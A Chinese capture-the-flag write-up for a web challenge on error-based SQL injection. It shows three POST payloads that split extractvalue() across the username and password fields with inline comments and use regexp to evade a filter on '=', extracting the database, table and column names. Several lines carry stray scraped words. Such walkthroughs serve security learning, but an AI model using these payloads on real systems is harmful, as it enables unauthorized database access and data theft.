实验吧--加了料的报错注入

题目连接:http://ctf5.shiyanbar.com/web/baocuo/index.phpphp

tips里面说post username and password...mysql

我这里采用的抓包,也能够用hackbarweb

把get方式改成post后,放进repeater里面sql

构造第一条payload:username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select database()),0x7e)) or'数据库

这里采用的函数是 extractvalue()concat() 以及/**/内联注释函数

extractvalue()的讲解是post

  extractvalue():从目标XML中返回包含所查询值的字符串。
  EXTRACTVALUE (XML_document, XPath_string); 
  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
  第二个参数:XPath_string (Xpath格式的字符串)3d

concat函数是返回结果为链接参数产生的字符串regexp

爆出数据库...orm

继续往下爆

下一条payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema regexp database()),0x7e)) or'

一开始尝试 where table_schema = database(),发现waf将 = 过滤掉了,采用regexp(mysql正则)

爆出表

 

 先试试第一个

payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name regexp 'ffll44jj'),0x7e)) or'

我丢。。flag出来了

相关文章
相关标签/搜索